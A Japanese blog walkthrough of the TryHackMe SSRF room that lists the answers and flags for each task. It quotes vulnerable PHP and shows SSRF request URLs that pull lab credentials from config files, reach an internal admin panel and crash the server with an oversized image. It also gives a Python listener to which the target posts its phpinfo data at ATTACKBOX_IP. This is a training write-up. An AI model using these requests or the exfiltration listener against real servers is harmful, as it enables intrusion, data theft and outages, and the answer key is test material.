Go to Qiita Advent Calendar 2024 Top
LoginSignup
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

@kk0128

【TryHackMe】SSRF:Walkthrough

Posted at

概要

TryHackMe「SSRF」のWalkthroughです。

Task2

Q1.What is the average weighted impact for the SSRF vulnerability as per the OWASP Top 10?

A.6.72

Task3

Q1.What is the username for the HRMS login panel?

/?url=localhost/copyrightにアクセスします。

task3 q1.jpg

copyrightの要素で、urlパラメータでパスを受け取ってfile_get_contents()しています。

$uri = rtrim($_GET['url'], "/");
...					
$path = ROOTPATH . $file;
...
if (file_exists($path)) {
  echo "<pre>";
  echo htmlspecialchars(file_get_contents($path));
  echo "</pre>";
  } else { ?>
    <p class="text-xl"><?= ltrim($file, "/") ?> is not found</p>
 <?php
...

/?url=localhost/configにアクセスすると設定情報が表示されました。

task3 q1 config.jpg

A.hrmsadmin

Q2.What is the password for the HRMS login panel?

A.hrmsadmin@123

Q3.What is the admin URL as per the config file?

A.http://192.168.2.10/admin.php

Q4.What is the flag value after successfully logging in to the HRMS web panel?

管理パネルにログインでき、フラグを入手します。

task3 q4 flag.jpg

A.THM_{1NiT_S$rF}

Task4

Q1.Is accessing non-routable addresses possible if a server is vulnerable to SSRF (yea/nay)?

A.yea

Q2.What is the flag value after accessing the admin panel?

internal-database.hrms.thmにログインします。

task4 q2.jpg

ソースコードを見るとローカルアドレスからデータを取得しています。

task4 q2 local.jpg

管理パネルのアドレスが、http://192.168.2.10/admin.phpと分かっているので宛先アドレスを変更します。

task4 q2 edit url.jpg

Select Categorysalaryに変更すると管理パネルが表示されました。

task4 q2 admin panel.jpg

A.THM_{B@\$ic_s\$rF}

Task5

Q1.Does Out-of-band SSRF always include a technique in which an attacker always receives direct responses from the server (yea/nay)?

A.nay

Q2.What is the value for Virtual Directory Support on the PHP server per the logged data?

http://hrms.thm/profile.php?url=localhost/getInfo.phpにアクセスします。

task5 q1.jpg

profile.phpではurlパラメータで指定されたアドレスにPOSTリクエストを送信しています。

profile.php
<?php
...
$targetUrl = $_GET['url'];
ob_start();
ob_start();
phpinfo();
$phpInfoData = ob_get_clean();
$ch = curl_init($targetUrl); 
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$phpInfoData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch); 
...
?>

server.pyを作成します。

server.py
from http.server import SimpleHTTPRequestHandler, HTTPServer
from urllib.parse import unquote
class CustomRequestHandler(SimpleHTTPRequestHandler):

    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')  # Allow requests from any origin
        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        super().end_headers()

    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'Hello, GET request!')

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length).decode('utf-8')

        self.send_response(200)
        self.end_headers()

        # Log the POST data to data.html
        with open('data.html', 'a') as file:
            file.write(post_data + '\n')
        response = f'THM, POST request! Received data: {post_data}'
        self.wfile.write(response.encode('utf-8'))

if __name__ == '__main__':
    server_address = ('', 8080)
    httpd = HTTPServer(server_address, CustomRequestHandler)
    print('Server running on http://localhost:8080/')
    httpd.serve_forever()

server.pyを実行し、HTTPサーバーを起動します。

$ python server.py           
Server running on http://localhost:8080/

http://hrms.thm/profile.php?url=http://ATTACKBOX_IP:8080にアクセスするとprofile.phpでPOSTリクエストしていたデータを取得できました。
取得したデータを基にdata.htmlが作成されました。

task5 data html.jpg

A.disabled

Q3.What is the value of the PHP Extension Build on the server?

A.API20190902,NTS

Q4.Which type of SSRF doesn't give us a direct response or feedback?

A.Blind

Task6

Q1.What is the flag value after loading a big image exceeding 100KB?

http://hrms.thm/url.php?id=192.168.2.10/trainingbanner.jpgにアクセスします。

task6.jpg

url.phpはサイズ100KB以下の画像を表示する処理をしています。

url.php
<?php
....
....
    if ($imageSize < 100) {
		  // Output the image if it's within the size limit
    
		$base64Image = downloadAndEncodeImage($imageUrl);
        echo '<img src="' . htmlspecialchars($base64Image) . '" alt="Image" style="width: 100%; height: 100%; object-fit: cover;">';

    } else {
	 	// Memory Outage - server will crash
    
....
...

?id=10.10.10.10に変更し、アクセスすると100KBを超え、エラーが発生しました。

task6 10 10.jpg

?id=192.168.2.10/bigImage.jpgにアクセスし、100KBを超える画像を読み込ませるとサーバーがクラッシュしました。

task6 flag.jpg

A.THM_{$$rF_Cr@$h3D}

Task7

Q1.Which of the following is the suggested approach while handling trusted URLs? Write the correct option only. a) Filter out disallowed URLs. b) Maintaining an allowlist of trusted URLs.

A.b

Q2.Since SSRF mainly exploits server-side requests, is it optional to sanitise the input URLs or parameters (yea/nay)?

A.nay

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?